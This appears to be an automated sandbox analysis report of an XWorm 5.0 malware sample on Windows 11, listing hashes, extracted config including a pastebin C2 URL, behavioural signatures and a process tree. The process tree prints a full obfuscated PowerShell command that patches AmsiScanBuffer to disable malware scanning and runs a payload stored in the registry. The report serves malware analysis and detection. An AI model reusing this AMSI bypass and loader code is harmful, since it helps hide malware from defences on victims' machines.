Analysis
-
max time kernel
60s -
max time network
60s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-06-2024 05:13
Static task
static1
General
-
Target
Iinpdftw.exe
-
Size
4.7MB
-
MD5
a9cb0e951c7ede7c23b5ba350b4920fd
-
SHA1
a16b2377a77e86b2a2cd27d58c44218e8aaa1a66
-
SHA256
0b75189b6f3d6e031159d20e351d60f6dd8956642e16d55083936096f73eb864
-
SHA512
300111595b2ea4fc3143b25faca8f97e27286221456c792f5ea80b3fe066baf5d1d2fcca122ebe17362ea3f26fdb06388356be122389229745972bb6d0b6fad4
-
SSDEEP
24576:VwtcEr/TQ/8YlE33S3++12pt/R31ggXSe1dFwUMWo8zrC9b84opK76iV7+rt9V23:rz
Malware Config
Extracted
xworm
5.0
Mc35OpRlVfHYgK3s
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/EiiXCJbn
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5072-5614-0x0000000000400000-0x0000000000412000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2916 created 636 2916 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 652 powershell.exe 4500 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
$77e1f23e$77f99bf3pid process 2752 $77e1f23e 5072 $77f99bf3 -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 5 IoCs
Processes:
svchost.exesvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\$77Docker Desktop Installer.exe svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Iinpdftw.exepowershell.EXEdescription pid process target process PID 4792 set thread context of 2752 4792 Iinpdftw.exe $77e1f23e PID 2916 set thread context of 4020 2916 powershell.EXE dllhost.exe PID 4792 set thread context of 5072 4792 Iinpdftw.exe $77f99bf3 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exeIinpdftw.exepid process 2916 powershell.EXE 2916 powershell.EXE 2916 powershell.EXE 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4792 Iinpdftw.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe 4020 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Iinpdftw.exepowershell.EXEdllhost.exe$77f99bf3svchost.exedescription pid process Token: SeDebugPrivilege 4792 Iinpdftw.exe Token: SeDebugPrivilege 2916 powershell.EXE Token: SeDebugPrivilege 2916 powershell.EXE Token: SeDebugPrivilege 4020 dllhost.exe Token: SeDebugPrivilege 4792 Iinpdftw.exe Token: SeDebugPrivilege 5072 $77f99bf3 Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe Token: SeTakeOwnershipPrivilege 2600 svchost.exe Token: SeLoadDriverPrivilege 2600 svchost.exe Token: SeSystemtimePrivilege 2600 svchost.exe Token: SeBackupPrivilege 2600 svchost.exe Token: SeRestorePrivilege 2600 svchost.exe Token: SeShutdownPrivilege 2600 svchost.exe Token: SeSystemEnvironmentPrivilege 2600 svchost.exe Token: SeUndockPrivilege 2600 svchost.exe Token: SeManageVolumePrivilege 2600 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe Token: SeTakeOwnershipPrivilege 2600 svchost.exe Token: SeLoadDriverPrivilege 2600 svchost.exe Token: SeSystemtimePrivilege 2600 svchost.exe Token: SeBackupPrivilege 2600 svchost.exe Token: SeRestorePrivilege 2600 svchost.exe Token: SeShutdownPrivilege 2600 svchost.exe Token: SeSystemEnvironmentPrivilege 2600 svchost.exe Token: SeUndockPrivilege 2600 svchost.exe Token: SeManageVolumePrivilege 2600 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe Token: SeTakeOwnershipPrivilege 2600 svchost.exe Token: SeLoadDriverPrivilege 2600 svchost.exe Token: SeSystemtimePrivilege 2600 svchost.exe Token: SeBackupPrivilege 2600 svchost.exe Token: SeRestorePrivilege 2600 svchost.exe Token: SeShutdownPrivilege 2600 svchost.exe Token: SeSystemEnvironmentPrivilege 2600 svchost.exe Token: SeUndockPrivilege 2600 svchost.exe Token: SeManageVolumePrivilege 2600 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe Token: SeTakeOwnershipPrivilege 2600 svchost.exe Token: SeLoadDriverPrivilege 2600 svchost.exe Token: SeSystemtimePrivilege 2600 svchost.exe Token: SeBackupPrivilege 2600 svchost.exe Token: SeRestorePrivilege 2600 svchost.exe Token: SeShutdownPrivilege 2600 svchost.exe Token: SeSystemEnvironmentPrivilege 2600 svchost.exe Token: SeUndockPrivilege 2600 svchost.exe Token: SeManageVolumePrivilege 2600 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2600 svchost.exe Token: SeIncreaseQuotaPrivilege 2600 svchost.exe Token: SeSecurityPrivilege 2600 svchost.exe Token: SeTakeOwnershipPrivilege 2600 svchost.exe Token: SeLoadDriverPrivilege 2600 svchost.exe Token: SeSystemtimePrivilege 2600 svchost.exe Token: SeBackupPrivilege 2600 svchost.exe Token: SeRestorePrivilege 2600 svchost.exe Token: SeShutdownPrivilege 2600 svchost.exe Token: SeSystemEnvironmentPrivilege 2600 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Iinpdftw.exepowershell.EXEdllhost.exedescription pid process target process PID 4792 wrote to memory of 2752 4792 Iinpdftw.exe $77e1f23e PID 4792 wrote to memory of 2752 4792 Iinpdftw.exe $77e1f23e PID 4792 wrote to memory of 2752 4792 Iinpdftw.exe $77e1f23e PID 4792 wrote to memory of 2752 4792 Iinpdftw.exe $77e1f23e PID 4792 wrote to memory of 2752 4792 Iinpdftw.exe $77e1f23e PID 4792 wrote to memory of 2752 4792 Iinpdftw.exe $77e1f23e PID 4792 wrote to memory of 2752 4792 Iinpdftw.exe $77e1f23e PID 4792 wrote to memory of 2752 4792 Iinpdftw.exe $77e1f23e PID 4792 wrote to memory of 2752 4792 Iinpdftw.exe $77e1f23e PID 2916 wrote to memory of 4020 2916 powershell.EXE dllhost.exe PID 2916 wrote to memory of 4020 2916 powershell.EXE dllhost.exe PID 2916 wrote to memory of 4020 2916 powershell.EXE dllhost.exe PID 2916 wrote to memory of 4020 2916 powershell.EXE dllhost.exe PID 2916 wrote to memory of 4020 2916 powershell.EXE dllhost.exe PID 2916 wrote to memory of 4020 2916 powershell.EXE dllhost.exe PID 2916 wrote to memory of 4020 2916 powershell.EXE dllhost.exe PID 2916 wrote to memory of 4020 2916 powershell.EXE dllhost.exe PID 4020 wrote to memory of 636 4020 dllhost.exe winlogon.exe PID 4020 wrote to memory of 692 4020 dllhost.exe lsass.exe PID 4020 wrote to memory of 1000 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 484 4020 dllhost.exe dwm.exe PID 4020 wrote to memory of 540 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 756 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1052 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1060 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1176 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1196 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1264 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1272 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1376 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1384 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1436 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1548 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1564 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1672 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1684 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1744 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1820 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1876 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1964 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1972 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1728 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 1788 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2088 4020 dllhost.exe spoolsv.exe PID 4020 wrote to memory of 2232 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2408 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2420 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2432 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2464 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2544 4020 dllhost.exe sysmon.exe PID 4020 wrote to memory of 2564 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2580 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2600 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2608 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 2780 4020 dllhost.exe sihost.exe PID 4020 wrote to memory of 1044 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 792 4020 dllhost.exe unsecapp.exe PID 4020 wrote to memory of 3316 4020 dllhost.exe Explorer.EXE PID 4020 wrote to memory of 3444 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 3476 4020 dllhost.exe svchost.exe PID 4020 wrote to memory of 3824 4020 dllhost.exe RuntimeBroker.exe PID 4020 wrote to memory of 3952 4020 dllhost.exe RuntimeBroker.exe PID 4020 wrote to memory of 3976 4020 dllhost.exe DllHost.exe PID 4020 wrote to memory of 4024 4020 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5eec782a-f8f0-4ad9-b2e7-233dfe61a98c}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GbJMDRrjyuFc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XBkbtFofyxzNOr,[Parameter(Position=1)][Type]$tWftyZHqGw)$ruVkoAIOMeM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+'e'+'c'+'t'+[Char](101)+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+'u'+'b'+'l'+'i'+''+'c'+',S'+[Char](101)+''+'a'+'le'+[Char](100)+''+[Char](44)+''+'A'+''+'n'+'siC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$ruVkoAIOMeM.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'eB'+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$XBkbtFofyxzNOr).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$ruVkoAIOMeM.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$tWftyZHqGw,$XBkbtFofyxzNOr).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ruVkoAIOMeM.CreateType();}$lMAvErwPyCAKQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+''+'U'+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+[Char](116)+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$KIlnvZNKHUUufP=$lMAvErwPyCAKQ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+[Char](65)+'d'+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('Pu'+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FxYIxNXGCNtlacKygpy=GbJMDRrjyuFc @([String])([IntPtr]);$jSNzfMHIUzuovPzemMisQa=GbJMDRrjyuFc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$awrKPPHUiPm=$lMAvErwPyCAKQ.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+[Char](114)+'n'+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$YdkcXPVLIuhnjM=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$awrKPPHUiPm,[Object](''+'L'+'oa'+'d'+''+'L'+'ib'+[Char](114)+''+[Char](97)+''+'r'+'y'+'A'+'')));$LEbKeLlEQzHrwDnOZ=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$awrKPPHUiPm,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+'l'+''+'P'+''+'r'+'ote'+[Char](99)+''+[Char](116)+'')));$NkbOJSD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YdkcXPVLIuhnjM,$FxYIxNXGCNtlacKygpy).Invoke('ams'+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$UYtmAyLBBKaSOGIGo=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$NkbOJSD,[Object](''+[Char](65)+''+'m'+'si'+'S'+''+'c'+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));$aRNyktcPCI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEbKeLlEQzHrwDnOZ,$jSNzfMHIUzuovPzemMisQa).Invoke($UYtmAyLBBKaSOGIGo,[uint32]8,4,[ref]$aRNyktcPCI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UYtmAyLBBKaSOGIGo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEbKeLlEQzHrwDnOZ,$jSNzfMHIUzuovPzemMisQa).Invoke($UYtmAyLBBKaSOGIGo,[uint32]8,0x20,[ref]$aRNyktcPCI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
